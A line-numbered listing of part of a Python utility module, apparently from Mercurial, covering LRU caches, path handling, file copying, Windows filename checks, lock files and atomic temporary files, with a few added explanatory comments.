1613 1613 node.prev.next = node.next
1614 1614 # D.prev = C
1615 1615 node.next.prev = node.prev
1616 1616 # N.prev = E
1617 1617 node.prev = head.prev
1618 1618 # N.next = A
1619 1619 # It is tempting to do just "head" here, however if node is
1620 1620 # adjacent to head, this will do bad things.
1621 1621 node.next = head.prev.next
1622 1622 # E.next = N
1623 1623 node.next.prev = node
1624 1624 # A.prev = N
1625 1625 node.prev.next = node
1626 1626
1627 1627 self._head = node
1628 1628
1629 1629 def _addcapacity(self):
1630 1630 """Add a node to the circular linked list.
1631 1631
1632 1632 The new node is inserted before the head node.
1633 1633 """
1634 1634 head = self._head
1635 1635 node = _lrucachenode()
1636 1636 head.prev.next = node
1637 1637 node.prev = head.prev
1638 1638 node.next = head
1639 1639 head.prev = node
1640 1640 self._size += 1
1641 1641 return node
1642 1642
1643 1643 def _enforcecostlimit(self):
1644 1644 # This should run after an insertion. It should only be called if total
1645 1645 # cost limits are being enforced.
1646 1646 # The most recently inserted node is never evicted.
1647 1647 if len(self) <= 1 or self.totalcost <= self.maxcost:
1648 1648 return
1649 1649
1650 1650 # This is logically equivalent to calling popoldest() until we
1651 1651 # free up enough cost. We don't do that since popoldest() needs
1652 1652 # to walk the linked list and doing this in a loop would be
1653 1653 # quadratic. So we find the first non-empty node and then
1654 1654 # walk nodes until we free up enough capacity.
1655 1655 #
1656 1656 # If we only removed the minimum number of nodes to free enough
1657 1657 # cost at insert time, chances are high that the next insert would
1658 1658 # also require pruning. This would effectively constitute quadratic
1659 1659 # behavior for insert-heavy workloads. To mitigate this, we set a
1660 1660 # target cost that is a percentage of the max cost. This will tend
1661 1661 # to free more nodes when the high water mark is reached, which
1662 1662 # lowers the chances of needing to prune on the subsequent insert.
1663 1663 targetcost = int(self.maxcost * 0.75)
1664 1664
1665 1665 n = self._head.prev
1666 1666 while n.key is _notset:
1667 1667 n = n.prev
1668 1668
1669 1669 while len(self) > 1 and self.totalcost > targetcost:
1670 1670 del self._cache[n.key]
1671 1671 self.totalcost -= n.cost
1672 1672 n.markempty()
1673 1673 n = n.prev
1674 1674
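# An illustrative sketch (comment only, not executed) of the cost-based
# eviction above; the keys and costs are made up:
#
#   d = lrucachedict(4, maxcost=10)
#   d.insert(b'a', b'va', cost=4)
#   d.insert(b'b', b'vb', cost=4)
#   d.insert(b'c', b'vc', cost=4)
#
# The third insert raises totalcost to 12 (> maxcost), so eviction runs
# down to targetcost = int(10 * 0.75) = 7: b'a' is evicted (totalcost 8,
# still > 7), then b'b' (totalcost 4), leaving only b'c'.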
1675 1675
1676 1676 def lrucachefunc(func):
1677 1677 '''cache most recent results of function calls'''
1678 1678 cache = {}
1679 1679 order = collections.deque()
1680 1680 if func.__code__.co_argcount == 1:
1681 1681
1682 1682 def f(arg):
1683 1683 if arg not in cache:
1684 1684 if len(cache) > 20:
1685 1685 del cache[order.popleft()]
1686 1686 cache[arg] = func(arg)
1687 1687 else:
1688 1688 order.remove(arg)
1689 1689 order.append(arg)
1690 1690 return cache[arg]
1691 1691
1692 1692 else:
1693 1693
1694 1694 def f(*args):
1695 1695 if args not in cache:
1696 1696 if len(cache) > 20:
1697 1697 del cache[order.popleft()]
1698 1698 cache[args] = func(*args)
1699 1699 else:
1700 1700 order.remove(args)
1701 1701 order.append(args)
1702 1702 return cache[args]
1703 1703
1704 1704 return f
1705 1705
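# An illustrative sketch of lrucachefunc; the wrapped function is
# hypothetical:
#
#   def parents(rev):
#       ...  # some expensive lookup
#   cachedparents = lrucachefunc(parents)
#   cachedparents(5)  # computed and cached
#   cachedparents(5)  # served from the cache
#
# The cache keeps roughly the 20 most recently used argument values;
# older entries are evicted least-recently-used first via the deque.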
1706 1706
1707 1707 class propertycache(object):
1708 1708 def __init__(self, func):
1709 1709 self.func = func
1710 1710 self.name = func.__name__
1711 1711
1712 1712 def __get__(self, obj, type=None):
1713 1713 result = self.func(obj)
1714 1714 self.cachevalue(obj, result)
1715 1715 return result
1716 1716
1717 1717 def cachevalue(self, obj, value):
1718 1718 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1719 1719 obj.__dict__[self.name] = value
1720 1720
1721 1721
1722 1722 def clearcachedproperty(obj, prop):
1723 1723 '''clear a cached property value, if one has been set'''
1724 1724 prop = pycompat.sysstr(prop)
1725 1725 if prop in obj.__dict__:
1726 1726 del obj.__dict__[prop]
1727 1727
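# An illustrative sketch of how propertycache is typically used; the
# class and attribute names are hypothetical:
#
#   class example(object):
#       @propertycache
#       def expensive(self):
#           return compute()  # runs only on first attribute access
#
# Because propertycache is a non-data descriptor (it has no __set__),
# the value stored in obj.__dict__ by cachevalue() shadows the
# descriptor on later accesses; clearcachedproperty(obj, 'expensive')
# deletes that value to force recomputation.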
1728 1728
1729 1729 def increasingchunks(source, min=1024, max=65536):
1730 1730 '''return no less than min bytes per chunk while data remains,
1731 1731 doubling min after each chunk until it reaches max'''
1732 1732
1733 1733 def log2(x):
1734 1734 if not x:
1735 1735 return 0
1736 1736 i = 0
1737 1737 while x:
1738 1738 x >>= 1
1739 1739 i += 1
1740 1740 return i - 1
1741 1741
1742 1742 buf = []
1743 1743 blen = 0
1744 1744 for chunk in source:
1745 1745 buf.append(chunk)
1746 1746 blen += len(chunk)
1747 1747 if blen >= min:
1748 1748 if min < max:
1749 1749 min = min << 1
1750 1750 nmin = 1 << log2(blen)
1751 1751 if nmin > min:
1752 1752 min = nmin
1753 1753 if min > max:
1754 1754 min = max
1755 1755 yield b''.join(buf)
1756 1756 blen = 0
1757 1757 buf = []
1758 1758 if buf:
1759 1759 yield b''.join(buf)
1760 1760
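# An illustrative trace (comment only): with the default min=1024 and
# ten 500-byte input chunks,
#
#   [len(c) for c in increasingchunks([b'x' * 500] * 10)]
#   -> [1500, 2500, 1000]
#
# The first yield happens once the buffer reaches the 1024 threshold,
# the threshold then doubles (2048, 4096, ...), and the final partial
# buffer is flushed at the end.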
1761 1761
1762 1762 def always(fn):
1763 1763 return True
1764 1764
1765 1765
1766 1766 def never(fn):
1767 1767 return False
1768 1768
1769 1769
1770 1770 def nogc(func):
1771 1771 """disable garbage collector
1772 1772
1773 1773 Python's garbage collector triggers a GC each time a certain number of
1774 1774 container objects (the number being defined by gc.get_threshold()) are
1775 1775 allocated even when marked not to be tracked by the collector. Tracking has
1776 1776 no effect on when GCs are triggered, only on what objects the GC looks
1777 1777 into. As a workaround, disable GC while building complex (huge)
1778 1778 containers.
1779 1779
1780 1780     This garbage collector issue has been fixed in 2.7, but it still
1781 1781     affects CPython's performance.
1782 1782 """
1783 1783
1784 1784 def wrapper(*args, **kwargs):
1785 1785 gcenabled = gc.isenabled()
1786 1786 gc.disable()
1787 1787 try:
1788 1788 return func(*args, **kwargs)
1789 1789 finally:
1790 1790 if gcenabled:
1791 1791 gc.enable()
1792 1792
1793 1793 return wrapper
1794 1794
1795 1795
1796 1796 if pycompat.ispypy:
1797 1797 # PyPy runs slower with gc disabled
1798 1798 nogc = lambda x: x
1799 1799
1800 1800
1801 1801 def pathto(root, n1, n2):
1802 1802 '''return the relative path from one place to another.
1803 1803 root should use os.sep to separate directories
1804 1804 n1 should use os.sep to separate directories
1805 1805 n2 should use "/" to separate directories
1806 1806 returns an os.sep-separated path.
1807 1807
1808 1808 If n1 is a relative path, it's assumed it's
1809 1809 relative to root.
1810 1810 n2 should always be relative to root.
1811 1811 '''
1812 1812 if not n1:
1813 1813 return localpath(n2)
1814 1814 if os.path.isabs(n1):
1815 1815 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1816 1816 return os.path.join(root, localpath(n2))
1817 1817 n2 = b'/'.join((pconvert(root), n2))
1818 1818 a, b = splitpath(n1), n2.split(b'/')
1819 1819 a.reverse()
1820 1820 b.reverse()
1821 1821 while a and b and a[-1] == b[-1]:
1822 1822 a.pop()
1823 1823 b.pop()
1824 1824 b.reverse()
1825 1825 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1826 1826
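# An illustrative example (POSIX separators assumed):
#
#   pathto(b'/repo', b'/repo/a/b', b'c/d') -> b'../../c/d'
#
# The common b'/repo' prefix is stripped, each remaining component of n1
# becomes one b'..' hop, and the walk then descends into n2.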
1827 1827
1828 1828 # the location of data files matching the source code
1829 1829 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != b'macosx_app':
1830 1830 # executable version (py2exe) doesn't support __file__
1831 1831 datapath = os.path.dirname(pycompat.sysexecutable)
1832 1832 else:
1833 1833 datapath = os.path.dirname(pycompat.fsencode(__file__))
1834 1834
1835 1835 i18n.setdatapath(datapath)
1836 1836
1837 1837
1838 1838 def checksignature(func):
1839 1839 '''wrap a function with code to check for calling errors'''
1840 1840
1841 1841 def check(*args, **kwargs):
1842 1842 try:
1843 1843 return func(*args, **kwargs)
1844 1844 except TypeError:
1845 1845 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1846 1846 raise error.SignatureError
1847 1847 raise
1848 1848
1849 1849 return check
1850 1850
1851 1851
1852 1852 # a whitelist of known filesystems where hardlinks work reliably
1853 1853 _hardlinkfswhitelist = {
1854 1854 b'apfs',
1855 1855 b'btrfs',
1856 1856 b'ext2',
1857 1857 b'ext3',
1858 1858 b'ext4',
1859 1859 b'hfs',
1860 1860 b'jfs',
1861 1861 b'NTFS',
1862 1862 b'reiserfs',
1863 1863 b'tmpfs',
1864 1864 b'ufs',
1865 1865 b'xfs',
1866 1866 b'zfs',
1867 1867 }
1868 1868
1869 1869
1870 1870 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1871 1871 '''copy a file, preserving mode and optionally other stat info like
1872 1872 atime/mtime
1873 1873
1874 1874 checkambig argument is used with filestat, and is useful only if
1875 1875 destination file is guarded by any lock (e.g. repo.lock or
1876 1876 repo.wlock).
1877 1877
1878 1878     copystat and checkambig should be mutually exclusive.
1879 1879 '''
1880 1880 assert not (copystat and checkambig)
1881 1881 oldstat = None
1882 1882 if os.path.lexists(dest):
1883 1883 if checkambig:
1884 1884 oldstat = checkambig and filestat.frompath(dest)
1885 1885 unlink(dest)
1886 1886 if hardlink:
1887 1887 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1888 1888 # unless we are confident that dest is on a whitelisted filesystem.
1889 1889 try:
1890 1890 fstype = getfstype(os.path.dirname(dest))
1891 1891 except OSError:
1892 1892 fstype = None
1893 1893 if fstype not in _hardlinkfswhitelist:
1894 1894 hardlink = False
1895 1895 if hardlink:
1896 1896 try:
1897 1897 oslink(src, dest)
1898 1898 return
1899 1899 except (IOError, OSError):
1900 1900 pass # fall back to normal copy
1901 1901 if os.path.islink(src):
1902 1902 os.symlink(os.readlink(src), dest)
1903 1903 # copytime is ignored for symlinks, but in general copytime isn't needed
1904 1904 # for them anyway
1905 1905 else:
1906 1906 try:
1907 1907 shutil.copyfile(src, dest)
1908 1908 if copystat:
1909 1909 # copystat also copies mode
1910 1910 shutil.copystat(src, dest)
1911 1911 else:
1912 1912 shutil.copymode(src, dest)
1913 1913 if oldstat and oldstat.stat:
1914 1914 newstat = filestat.frompath(dest)
1915 1915 if newstat.isambig(oldstat):
1916 1916 # stat of copied file is ambiguous to original one
1917 1917 advanced = (
1918 1918 oldstat.stat[stat.ST_MTIME] + 1
1919 1919 ) & 0x7FFFFFFF
1920 1920 os.utime(dest, (advanced, advanced))
1921 1921 except shutil.Error as inst:
1922 1922 raise error.Abort(str(inst))
1923 1923
1924 1924
1925 1925 def copyfiles(src, dst, hardlink=None, progress=None):
1926 1926 """Copy a directory tree using hardlinks if possible."""
1927 1927 num = 0
1928 1928
1929 1929 def settopic():
1930 1930 if progress:
1931 1931 progress.topic = _(b'linking') if hardlink else _(b'copying')
1932 1932
1933 1933 if os.path.isdir(src):
1934 1934 if hardlink is None:
1935 1935 hardlink = (
1936 1936 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1937 1937 )
1938 1938 settopic()
1939 1939 os.mkdir(dst)
1940 1940 for name, kind in listdir(src):
1941 1941 srcname = os.path.join(src, name)
1942 1942 dstname = os.path.join(dst, name)
1943 1943 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1944 1944 num += n
1945 1945 else:
1946 1946 if hardlink is None:
1947 1947 hardlink = (
1948 1948 os.stat(os.path.dirname(src)).st_dev
1949 1949 == os.stat(os.path.dirname(dst)).st_dev
1950 1950 )
1951 1951 settopic()
1952 1952
1953 1953 if hardlink:
1954 1954 try:
1955 1955 oslink(src, dst)
1956 1956 except (IOError, OSError):
1957 1957 hardlink = False
1958 1958 shutil.copy(src, dst)
1959 1959 else:
1960 1960 shutil.copy(src, dst)
1961 1961 num += 1
1962 1962 if progress:
1963 1963 progress.increment()
1964 1964
1965 1965 return hardlink, num
1966 1966
1967 1967
1968 1968 _winreservednames = {
1969 1969 b'con',
1970 1970 b'prn',
1971 1971 b'aux',
1972 1972 b'nul',
1973 1973 b'com1',
1974 1974 b'com2',
1975 1975 b'com3',
1976 1976 b'com4',
1977 1977 b'com5',
1978 1978 b'com6',
1979 1979 b'com7',
1980 1980 b'com8',
1981 1981 b'com9',
1982 1982 b'lpt1',
1983 1983 b'lpt2',
1984 1984 b'lpt3',
1985 1985 b'lpt4',
1986 1986 b'lpt5',
1987 1987 b'lpt6',
1988 1988 b'lpt7',
1989 1989 b'lpt8',
1990 1990 b'lpt9',
1991 1991 }
1992 1992 _winreservedchars = b':*?"<>|'
1993 1993
1994 1994
1995 1995 def checkwinfilename(path):
1996 1996 r'''Check that the base-relative path is a valid filename on Windows.
1997 1997 Returns None if the path is ok, or a UI string describing the problem.
1998 1998
1999 1999 >>> checkwinfilename(b"just/a/normal/path")
2000 2000 >>> checkwinfilename(b"foo/bar/con.xml")
2001 2001 "filename contains 'con', which is reserved on Windows"
2002 2002 >>> checkwinfilename(b"foo/con.xml/bar")
2003 2003 "filename contains 'con', which is reserved on Windows"
2004 2004 >>> checkwinfilename(b"foo/bar/xml.con")
2005 2005 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2006 2006 "filename contains 'AUX', which is reserved on Windows"
2007 2007 >>> checkwinfilename(b"foo/bar/bla:.txt")
2008 2008 "filename contains ':', which is reserved on Windows"
2009 2009 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2010 2010 "filename contains '\\x07', which is invalid on Windows"
2011 2011 >>> checkwinfilename(b"foo/bar/bla ")
2012 2012 "filename ends with ' ', which is not allowed on Windows"
2013 2013 >>> checkwinfilename(b"../bar")
2014 2014 >>> checkwinfilename(b"foo\\")
2015 2015 "filename ends with '\\', which is invalid on Windows"
2016 2016 >>> checkwinfilename(b"foo\\/bar")
2017 2017 "directory name ends with '\\', which is invalid on Windows"
2018 2018 '''
2019 2019 if path.endswith(b'\\'):
2020 2020 return _(b"filename ends with '\\', which is invalid on Windows")
2021 2021 if b'\\/' in path:
2022 2022 return _(b"directory name ends with '\\', which is invalid on Windows")
2023 2023 for n in path.replace(b'\\', b'/').split(b'/'):
2024 2024 if not n:
2025 2025 continue
2026 2026 for c in _filenamebytestr(n):
2027 2027 if c in _winreservedchars:
2028 2028 return (
2029 2029 _(
2030 2030 b"filename contains '%s', which is reserved "
2031 2031 b"on Windows"
2032 2032 )
2033 2033 % c
2034 2034 )
2035 2035 if ord(c) <= 31:
2036 2036 return _(
2037 2037 b"filename contains '%s', which is invalid on Windows"
2038 2038 ) % stringutil.escapestr(c)
2039 2039 base = n.split(b'.')[0]
2040 2040 if base and base.lower() in _winreservednames:
2041 2041 return (
2042 2042 _(b"filename contains '%s', which is reserved on Windows")
2043 2043 % base
2044 2044 )
2045 2045 t = n[-1:]
2046 2046 if t in b'. ' and n not in b'..':
2047 2047 return (
2048 2048 _(
2049 2049 b"filename ends with '%s', which is not allowed "
2050 2050 b"on Windows"
2051 2051 )
2052 2052 % t
2053 2053 )
2054 2054
2055 2055
2056 2056 if pycompat.iswindows:
2057 2057 checkosfilename = checkwinfilename
2058 2058 timer = time.clock
2059 2059 else:
2060 2060 checkosfilename = platform.checkosfilename
2061 2061 timer = time.time
2062 2062
2063 2063 if safehasattr(time, "perf_counter"):
2064 2064 timer = time.perf_counter
2065 2065
2066 2066
2067 2067 def makelock(info, pathname):
2068 2068 """Create a lock file atomically if possible
2069 2069
2070 2070 This may leave a stale lock file if symlink isn't supported and signal
2071 2071 interrupt is enabled.
2072 2072 """
2073 2073 try:
2074 2074 return os.symlink(info, pathname)
2075 2075 except OSError as why:
2076 2076 if why.errno == errno.EEXIST:
2077 2077 raise
2078 2078 except AttributeError: # no symlink in os
2079 2079 pass
2080 2080
2081 2081 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2082 2082 ld = os.open(pathname, flags)
2083 2083 os.write(ld, info)
2084 2084 os.close(ld)
2085 2085
2086 2086
2087 2087 def readlock(pathname):
2088 2088 try:
2089 2089 return readlink(pathname)
2090 2090 except OSError as why:
2091 2091 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2092 2092 raise
2093 2093 except AttributeError: # no symlink in os
2094 2094 pass
2095 2095 with posixfile(pathname, b'rb') as fp:
2096 2096 return fp.read()
2097 2097
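# An illustrative round trip (the lock path and contents here are
# hypothetical):
#
#   makelock(b'host:1234', b'.hg/wlock')   # symlink, or O_EXCL file
#                                          # as a fallback
#   readlock(b'.hg/wlock') -> b'host:1234'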
2098 2098
2099 2099 def fstat(fp):
2100 2100 '''stat file object that may not have fileno method.'''
2101 2101 try:
2102 2102 return os.fstat(fp.fileno())
2103 2103 except AttributeError:
2104 2104 return os.stat(fp.name)
2105 2105
2106 2106
2107 2107 # File system features
2108 2108
2109 2109
2110 2110 def fscasesensitive(path):
2111 2111 """
2112 2112 Return true if the given path is on a case-sensitive filesystem
2113 2113
2114 2114 Requires a path (like /foo/.hg) ending with a foldable final
2115 2115 directory component.
2116 2116 """
2117 2117 s1 = os.lstat(path)
2118 2118 d, b = os.path.split(path)
2119 2119 b2 = b.upper()
2120 2120 if b == b2:
2121 2121 b2 = b.lower()
2122 2122 if b == b2:
2123 2123 return True # no evidence against case sensitivity
2124 2124 p2 = os.path.join(d, b2)
2125 2125 try:
2126 2126 s2 = os.lstat(p2)
2127 2127 if s2 == s1:
2128 2128 return False
2129 2129 return True
2130 2130 except OSError:
2131 2131 return True
2132 2132
2133 2133
2134 2134 try:
2135 2135 import re2
2136 2136
2137 2137 _re2 = None
2138 2138 except ImportError:
2139 2139 _re2 = False
2140 2140
2141 2141
2142 2142 class _re(object):
2143 2143 def _checkre2(self):
2144 2144 global _re2
2145 2145 try:
2146 2146 # check if match works, see issue3964
2147 2147 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2148 2148 except ImportError:
2149 2149 _re2 = False
2150 2150
2151 2151 def compile(self, pat, flags=0):
2152 2152 '''Compile a regular expression, using re2 if possible
2153 2153
2154 2154 For best performance, use only re2-compatible regexp features. The
2155 2155 only flags from the re module that are re2-compatible are
2156 2156 IGNORECASE and MULTILINE.'''
2157 2157 if _re2 is None:
2158 2158 self._checkre2()
2159 2159 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2160 2160 if flags & remod.IGNORECASE:
2161 2161 pat = b'(?i)' + pat
2162 2162 if flags & remod.MULTILINE:
2163 2163 pat = b'(?m)' + pat
2164 2164 try:
2165 2165 return re2.compile(pat)
2166 2166 except re2.error:
2167 2167 pass
2168 2168 return remod.compile(pat, flags)
2169 2169
2170 2170 @propertycache
2171 2171 def escape(self):
2172 2172 '''Return the version of escape corresponding to self.compile.
2173 2173
2174 2174 This is imperfect because whether re2 or re is used for a particular
2175 2175 function depends on the flags, etc, but it's the best we can do.
2176 2176 '''
2177 2177 global _re2
2178 2178 if _re2 is None:
2179 2179 self._checkre2()
2180 2180 if _re2:
2181 2181 return re2.escape
2182 2182 else:
2183 2183 return remod.escape
2184 2184
2185 2185
2186 2186 re = _re()
2187 2187
2188 2188 _fspathcache = {}
2189 2189
2190 2190
2191 2191 def fspath(name, root):
2192 2192 '''Get name in the case stored in the filesystem
2193 2193
2194 2194 The name should be relative to root, and be normcase-ed for efficiency.
2195 2195
2196 2196 Note that this function is unnecessary, and should not be
2197 2197 called, for case-sensitive filesystems (simply because it's expensive).
2198 2198
2199 2199 The root should be normcase-ed, too.
2200 2200 '''
2201 2201
2202 2202 def _makefspathcacheentry(dir):
2203 2203 return dict((normcase(n), n) for n in os.listdir(dir))
2204 2204
2205 2205 seps = pycompat.ossep
2206 2206 if pycompat.osaltsep:
2207 2207 seps = seps + pycompat.osaltsep
2208 2208     # Protect backslashes. This gets silly very quickly.
2209 2209     seps = seps.replace(b'\\', b'\\\\')
2210 2210 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2211 2211 dir = os.path.normpath(root)
2212 2212 result = []
2213 2213 for part, sep in pattern.findall(name):
2214 2214 if sep:
2215 2215 result.append(sep)
2216 2216 continue
2217 2217
2218 2218 if dir not in _fspathcache:
2219 2219 _fspathcache[dir] = _makefspathcacheentry(dir)
2220 2220 contents = _fspathcache[dir]
2221 2221
2222 2222 found = contents.get(part)
2223 2223 if not found:
2224 2224             # retry "once per directory" per "dirstate.walk", which
2225 2225             # may take place for each patch of "hg qpush", for example
2226 2226 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2227 2227 found = contents.get(part)
2228 2228
2229 2229 result.append(found or part)
2230 2230 dir = os.path.join(dir, part)
2231 2231
2232 2232 return b''.join(result)
2233 2233
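# An illustrative sketch (paths hypothetical): on a case-insensitive
# filesystem where the file is stored on disk as b'Foo/Bar.txt',
#
#   fspath(b'foo/bar.txt', b'/repo') -> b'Foo/Bar.txt'
#
# assuming both arguments were already normcase-ed as documented above.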
2234 2234
2235 2235 def checknlink(testfile):
2236 2236 '''check whether hardlink count reporting works properly'''
2237 2237
2238 2238 # testfile may be open, so we need a separate file for checking to
2239 2239 # work around issue2543 (or testfile may get lost on Samba shares)
2240 2240 f1, f2, fp = None, None, None
2241 2241 try:
2242 2242 fd, f1 = pycompat.mkstemp(
2243 2243 prefix=b'.%s-' % os.path.basename(testfile),
2244 2244 suffix=b'1~',
2245 2245 dir=os.path.dirname(testfile),
2246 2246 )
2247 2247 os.close(fd)
2248 2248 f2 = b'%s2~' % f1[:-2]
2249 2249
2250 2250 oslink(f1, f2)
2251 2251 # nlinks() may behave differently for files on Windows shares if
2252 2252 # the file is open.
2253 2253 fp = posixfile(f2)
2254 2254 return nlinks(f2) > 1
2255 2255 except OSError:
2256 2256 return False
2257 2257 finally:
2258 2258 if fp is not None:
2259 2259 fp.close()
2260 2260 for f in (f1, f2):
2261 2261 try:
2262 2262 if f is not None:
2263 2263 os.unlink(f)
2264 2264 except OSError:
2265 2265 pass
2266 2266
2267 2267
2268 2268 def endswithsep(path):
2269 2269 '''Check path ends with os.sep or os.altsep.'''
2270 2270 return (
2271 2271 path.endswith(pycompat.ossep)
2272 2272 or pycompat.osaltsep
2273 2273 and path.endswith(pycompat.osaltsep)
2274 2274 )
2275 2275
2276 2276
2277 2277 def splitpath(path):
2278 2278 '''Split path by os.sep.
2279 2279     Note that this function does not use os.altsep because it is
2280 2280     meant as a simple alternative to "xxx.split(os.sep)".
2281 2281     It is recommended to use os.path.normpath() before using this
2282 2282     function if needed.'''
2283 2283 return path.split(pycompat.ossep)
2284 2284
2285 2285
2286 2286 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2287 2287 """Create a temporary file with the same contents from name
2288 2288
2289 2289 The permission bits are copied from the original file.
2290 2290
2291 2291 If the temporary file is going to be truncated immediately, you
2292 2292 can use emptyok=True as an optimization.
2293 2293
2294 2294 Returns the name of the temporary file.
2295 2295 """
2296 2296 d, fn = os.path.split(name)
2297 2297 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2298 2298 os.close(fd)
2299 2299 # Temporary files are created with mode 0600, which is usually not
2300 2300 # what we want. If the original file already exists, just copy
2301 2301 # its mode. Otherwise, manually obey umask.
2302 2302 copymode(name, temp, createmode, enforcewritable)
2303 2303
2304 2304 if emptyok:
2305 2305 return temp
2306 2306 try:
2307 2307 try:
2308 2308 ifp = posixfile(name, b"rb")
2309 2309 except IOError as inst:
2310 2310 if inst.errno == errno.ENOENT:
2311 2311 return temp
2312 2312 if not getattr(inst, 'filename', None):
2313 2313 inst.filename = name
2314 2314 raise
2315 2315 ofp = posixfile(temp, b"wb")
2316 2316 for chunk in filechunkiter(ifp):
2317 2317 ofp.write(chunk)
2318 2318 ifp.close()
2319 2319 ofp.close()
2320 2320 except: # re-raises
2321 2321 try:
2322 2322 os.unlink(temp)
2323 2323 except OSError:
2324 2324 pass
2325 2325 raise
2326 2326 return temp
2327 2327
2328 2328
2329 2329 class filestat(object):
2330 2330 """help to exactly detect change of a file
2331 2331
2332 2332     The 'stat' attribute is the result of 'os.stat()' if the specified
2333 2333     'path' exists; otherwise it is None. This lets callers avoid a
2334 2334     separate preparatory 'exists()' check.
2335 2335 """
2336 2336
2337 2337 def __init__(self, stat):
2338 2338 self.stat = stat
2339 2339
2340 2340 @classmethod
2341 2341 def frompath(cls, path):
2342 2342 try:
2343 2343 stat = os.stat(path)
2344 2344 except OSError as err:
2345 2345 if err.errno != errno.ENOENT:
2346 2346 raise
2347 2347 stat = None
2348 2348 return cls(stat)
2349 2349
2350 2350 @classmethod
2351 2351 def fromfp(cls, fp):
2352 2352 stat = os.fstat(fp.fileno())
2353 2353 return cls(stat)
2354 2354
2355 2355 __hash__ = object.__hash__
2356 2356
2357 2357 def __eq__(self, old):
2358 2358 try:
2359 2359 # if ambiguity between stat of new and old file is
2360 2360 # avoided, comparison of size, ctime and mtime is enough
2361 2361 # to exactly detect change of a file regardless of platform
2362 2362 return (
2363 2363 self.stat.st_size == old.stat.st_size
2364 2364 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2365 2365 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2366 2366 )
2367 2367 except AttributeError:
2368 2368 pass
2369 2369 try:
2370 2370 return self.stat is None and old.stat is None
2371 2371 except AttributeError:
2372 2372 return False
2373 2373
2374 2374 def isambig(self, old):
2375 2375 """Examine whether new (= self) stat is ambiguous against old one
2376 2376
2377 2377 "S[N]" below means stat of a file at N-th change:
2378 2378
2379 2379 - S[n-1].ctime < S[n].ctime: can detect change of a file
2380 2380 - S[n-1].ctime == S[n].ctime
2381 2381 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2382 2382 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2383 2383 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2384 2384 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2385 2385
2386 2386         Case (*2) above means that a file was changed twice or more
2387 2387         within the same second (= S[n-1].ctime), so comparing
2388 2388         timestamps cannot detect the change.
2389 2389
2390 2390         The basic idea for avoiding such ambiguity is to "advance
2391 2391         mtime by 1 sec, if the timestamp is ambiguous".
2392 2392
2393 2393         But advancing mtime only in case (*2) doesn't work as
2394 2394         expected, because a naturally advanced S[n].mtime in case (*1)
2395 2395         might be equal to a manually advanced S[n-1 or earlier].mtime.
2396 2396
2397 2397         Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2398 2398         treated as ambiguous regardless of mtime, to avoid overlooking
2399 2399         changes hidden by such mtime collisions.
2400 2400
2401 2401 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2402 2402 S[n].mtime", even if size of a file isn't changed.
2403 2403 """
2404 2404 try:
2405 2405 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2406 2406 except AttributeError:
2407 2407 return False
2408 2408
2409 2409 def avoidambig(self, path, old):
2410 2410 """Change file stat of specified path to avoid ambiguity
2411 2411
2412 2412 'old' should be previous filestat of 'path'.
2413 2413
2414 2414         Avoiding ambiguity is skipped, and False is returned, if the
2415 2415         process doesn't have appropriate privileges for 'path'.
2417 2417
2418 2418 Otherwise, this returns True, as "ambiguity is avoided".
2419 2419 """
2420 2420 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2421 2421 try:
2422 2422 os.utime(path, (advanced, advanced))
2423 2423 except OSError as inst:
2424 2424 if inst.errno == errno.EPERM:
2425 2425 # utime() on the file created by another user causes EPERM,
2426 2426 # if a process doesn't have appropriate privileges
2427 2427 return False
2428 2428 raise
2429 2429 return True
2430 2430
2431 2431 def __ne__(self, other):
2432 2432 return not self == other
2433 2433
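# An illustrative sketch of the ambiguity dance described above; the
# file name is hypothetical:
#
#   old = filestat.frompath(b'data')
#   # ... b'data' is rewritten within the same second ...
#   new = filestat.frompath(b'data')
#   if new.isambig(old):
#       new.avoidambig(b'data', old)  # advance mtime to old mtime + 1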
2434 2434
2435 2435 class atomictempfile(object):
2436 2436 '''writable file object that atomically updates a file
2437 2437
2438 2438 All writes will go to a temporary copy of the original file. Call
2439 2439 close() when you are done writing, and atomictempfile will rename
2440 2440 the temporary copy to the original name, making the changes
2441 2441 visible. If the object is destroyed without being closed, all your
2442 2442 writes are discarded.
2443 2443
2444 2444 checkambig argument of constructor is used with filestat, and is
2445 2445 useful only if target file is guarded by any lock (e.g. repo.lock
2446 2446 or repo.wlock).
2447 2447 '''
2448 2448
2449 2449 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2450 2450 self.__name = name # permanent name
2451 2451 self._tempname = mktempcopy(
2452 2452 name,
2453 2453 emptyok=(b'w' in mode),
2454 2454 createmode=createmode,
2455 2455 enforcewritable=(b'w' in mode),
2456 2456 )
2457 2457
2458 2458 self._fp = posixfile(self._tempname, mode)
2459 2459 self._checkambig = checkambig
2460 2460
2461 2461 # delegated methods
2462 2462 self.read = self._fp.read
